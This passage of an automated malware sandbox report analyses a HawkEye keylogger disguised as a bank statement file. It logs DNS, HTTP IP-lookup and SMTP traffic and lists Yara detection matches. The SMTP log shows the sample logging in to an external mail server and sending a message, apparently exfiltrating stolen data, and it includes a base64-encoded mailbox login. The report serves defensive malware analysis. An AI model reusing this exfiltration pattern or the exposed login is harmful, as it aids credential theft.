                                                                              Nov 19, 2020 16:04:22.344558001 CET53589458.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:25.163994074 CET6077953192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:25.191025019 CET53607798.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:35.599082947 CET6401453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:35.634669065 CET53640148.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:35.926879883 CET5709153192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:35.962539911 CET53570918.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:36.047477961 CET5590453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:36.082937956 CET53559048.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:38.866419077 CET5210953192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:38.893517017 CET53521098.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:47.181365967 CET5445053192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:47.216671944 CET53544508.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:47.244704962 CET4937453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:47.279954910 CET53493748.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:47.332782984 CET5043653192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:47.368083954 CET53504368.8.8.8192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Nov 19, 2020 16:02:53.947966099 CET192.168.2.48.8.8.80x1630Standard query (0)201.75.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.437556982 CET192.168.2.48.8.8.80xb1cStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.565713882 CET192.168.2.48.8.8.80x3b3cStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:08.569644928 CET192.168.2.48.8.8.80x1187Standard query (0)mail.iigcest.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:42.565202951 CET192.168.2.48.8.8.80xa237Standard query (0)201.75.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:03:42.855329990 CET192.168.2.48.8.8.80x1544Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:42.963808060 CET192.168.2.48.8.8.80x9d9eStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:56.284164906 CET192.168.2.48.8.8.80xabe9Standard query (0)201.75.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.046384096 CET192.168.2.48.8.8.80xf967Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.168235064 CET192.168.2.48.8.8.80xc658Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:10.725539923 CET192.168.2.48.8.8.80x5c45Standard query (0)mail.iigcest.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:21.843602896 CET192.168.2.48.8.8.80x2ed2Standard query (0)201.75.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.194811106 CET192.168.2.48.8.8.80x93bdStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.309029102 CET192.168.2.48.8.8.80x693aStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:35.599082947 CET192.168.2.48.8.8.80x3a36Standard query (0)201.75.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:04:35.926879883 CET192.168.2.48.8.8.80x5b58Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:36.047477961 CET192.168.2.48.8.8.80x4193Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.181365967 CET192.168.2.48.8.8.80x9317Standard query (0)201.75.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.244704962 CET192.168.2.48.8.8.80xce8dStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.332782984 CET192.168.2.48.8.8.80xf3c1Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Nov 19, 2020 16:02:53.983439922 CET8.8.8.8192.168.2.40x1630Name error (3)201.75.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.475153923 CET8.8.8.8192.168.2.40xb1cNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.475153923 CET8.8.8.8192.168.2.40xb1cNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.592853069 CET8.8.8.8192.168.2.40x3b3cNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:02:54.592853069 CET8.8.8.8192.168.2.40x3b3cNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:08.608561039 CET8.8.8.8192.168.2.40x1187No error (0)mail.iigcest.com166.62.27.57A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:42.601363897 CET8.8.8.8192.168.2.40xa237Name error (3)201.75.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:03:42.890909910 CET8.8.8.8192.168.2.40x1544No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:42.890909910 CET8.8.8.8192.168.2.40x1544No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:43.004244089 CET8.8.8.8192.168.2.40x9d9eNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:43.004244089 CET8.8.8.8192.168.2.40x9d9eNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:56.319935083 CET8.8.8.8192.168.2.40xabe9Name error (3)201.75.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.082009077 CET8.8.8.8192.168.2.40xf967No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.082009077 CET8.8.8.8192.168.2.40xf967No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.204073906 CET8.8.8.8192.168.2.40xc658No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:03:58.204073906 CET8.8.8.8192.168.2.40xc658No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:10.771277905 CET8.8.8.8192.168.2.40x5c45No error (0)mail.iigcest.com166.62.27.57A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:21.879123926 CET8.8.8.8192.168.2.40x2ed2Name error (3)201.75.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.230504036 CET8.8.8.8192.168.2.40x93bdNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.230504036 CET8.8.8.8192.168.2.40x93bdNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.344558001 CET8.8.8.8192.168.2.40x693aNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:22.344558001 CET8.8.8.8192.168.2.40x693aNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:35.634669065 CET8.8.8.8192.168.2.40x3a36Name error (3)201.75.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:04:35.962539911 CET8.8.8.8192.168.2.40x5b58No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:35.962539911 CET8.8.8.8192.168.2.40x5b58No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:36.082937956 CET8.8.8.8192.168.2.40x4193No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:36.082937956 CET8.8.8.8192.168.2.40x4193No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.216671944 CET8.8.8.8192.168.2.40x9317Name error (3)201.75.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.279954910 CET8.8.8.8192.168.2.40xce8dNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.279954910 CET8.8.8.8192.168.2.40xce8dNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.368083954 CET8.8.8.8192.168.2.40xf3c1No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                              Nov 19, 2020 16:04:47.368083954 CET8.8.8.8192.168.2.40xf3c1No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • whatismyipaddress.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.449738104.16.154.3680C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Nov 19, 2020 16:02:54.517074108 CET1095OUTGET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:02:54.541414976 CET1096INHTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:02:54 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:02:54 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a0b73b000097f6a09da000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad09ecebf97f6-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.449764104.16.155.3680C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Nov 19, 2020 16:03:42.927691936 CET2233OUTGET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:03:42.956650972 CET2234INHTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:03:42 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:03:42 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a1745600002bd6a58a5000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad1cd5d052bd6-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              2192.168.2.449774104.16.155.3680C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Nov 19, 2020 16:03:58.127439022 CET6336OUTGET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:03:58.157450914 CET6337INHTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:03:58 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:03:58 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a1afb50000dfcfea8ac000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad22c5b78dfcf-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              3192.168.2.449783104.16.154.3680C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Nov 19, 2020 16:04:22.275377035 CET6390OUTGET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:04:22.298597097 CET6391INHTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:04:22 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:04:22 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a20e0900002b29571f3000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad2c34bba2b29-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              4192.168.2.449789104.16.154.3680C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Nov 19, 2020 16:04:36.009860039 CET6414OUTGET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:04:36.037992001 CET6414INHTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:04:36 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:04:36 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a243b00000c29552921000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad3191c7fc295-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              5192.168.2.449794104.16.154.3680C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Nov 19, 2020 16:04:47.301661015 CET6429OUTGET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:04:47.330806971 CET6430INHTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:04:47 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:04:47 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a26fcf00000eaf462bc000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad35fbef10eaf-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              SMTP Packets

                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                              Nov 19, 2020 16:03:09.597856998 CET58749746166.62.27.57192.168.2.4220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Thu, 19 Nov 2020 08:03:09 -0700
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Nov 19, 2020 16:03:09.598325968 CET49746587192.168.2.4166.62.27.57EHLO 936905
                                                                              Nov 19, 2020 16:03:09.869668961 CET58749746166.62.27.57192.168.2.4250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 936905 [84.17.52.25]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-CHUNKING
                                                                              250-STARTTLS
                                                                              250-SMTPUTF8
                                                                              250 HELP
                                                                              Nov 19, 2020 16:03:09.873588085 CET49746587192.168.2.4166.62.27.57AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                              Nov 19, 2020 16:03:10.145303011 CET58749746166.62.27.57192.168.2.4334 UGFzc3dvcmQ6
                                                                              Nov 19, 2020 16:03:10.425162077 CET58749746166.62.27.57192.168.2.4235 Authentication succeeded
                                                                              Nov 19, 2020 16:03:10.426595926 CET49746587192.168.2.4166.62.27.57MAIL FROM:<ansaf@iigcest.com>
                                                                              Nov 19, 2020 16:03:10.697953939 CET58749746166.62.27.57192.168.2.4250 OK
                                                                              Nov 19, 2020 16:03:10.699817896 CET49746587192.168.2.4166.62.27.57RCPT TO:<ansaf@iigcest.com>
                                                                              Nov 19, 2020 16:03:10.972868919 CET58749746166.62.27.57192.168.2.4250 Accepted
                                                                              Nov 19, 2020 16:03:10.973298073 CET49746587192.168.2.4166.62.27.57DATA
                                                                              Nov 19, 2020 16:03:11.244570017 CET58749746166.62.27.57192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                              Nov 19, 2020 16:03:11.245651960 CET49746587192.168.2.4166.62.27.57.
                                                                              Nov 19, 2020 16:03:11.527730942 CET58749746166.62.27.57192.168.2.4250 OK id=1kflSp-007rOY-24
                                                                              Nov 19, 2020 16:04:11.305751085 CET58749780166.62.27.57192.168.2.4220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Thu, 19 Nov 2020 08:04:11 -0700
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Nov 19, 2020 16:04:11.306165934 CET49780587192.168.2.4166.62.27.57EHLO 936905
                                                                              Nov 19, 2020 16:04:11.568952084 CET58749780166.62.27.57192.168.2.4250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 936905 [84.17.52.25]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-CHUNKING
                                                                              250-STARTTLS
                                                                              250-SMTPUTF8
                                                                              250 HELP
                                                                              Nov 19, 2020 16:04:11.569655895 CET49780587192.168.2.4166.62.27.57AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                              Nov 19, 2020 16:04:11.837136030 CET58749780166.62.27.57192.168.2.4334 UGFzc3dvcmQ6
                                                                              Nov 19, 2020 16:04:12.112052917 CET58749780166.62.27.57192.168.2.4235 Authentication succeeded
                                                                              Nov 19, 2020 16:04:12.112370968 CET49780587192.168.2.4166.62.27.57MAIL FROM:<ansaf@iigcest.com>
                                                                              Nov 19, 2020 16:04:12.375014067 CET58749780166.62.27.57192.168.2.4250 OK

                                                                              Code Manipulations

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 1496 Parent PID: 5864

                                                                              General

                                                                              Start time:16:02:43
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 4500 Parent PID: 1496

                                                                              General

                                                                              Start time:16:02:43
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.771774923.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.771774923.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 3984 Parent PID: 1496

                                                                              General

                                                                              Start time:16:02:44
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4500 5715437
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: dw20.exe PID: 5996 Parent PID: 4500

                                                                              General

                                                                              Start time:16:02:55
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2264
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Chronological Activities

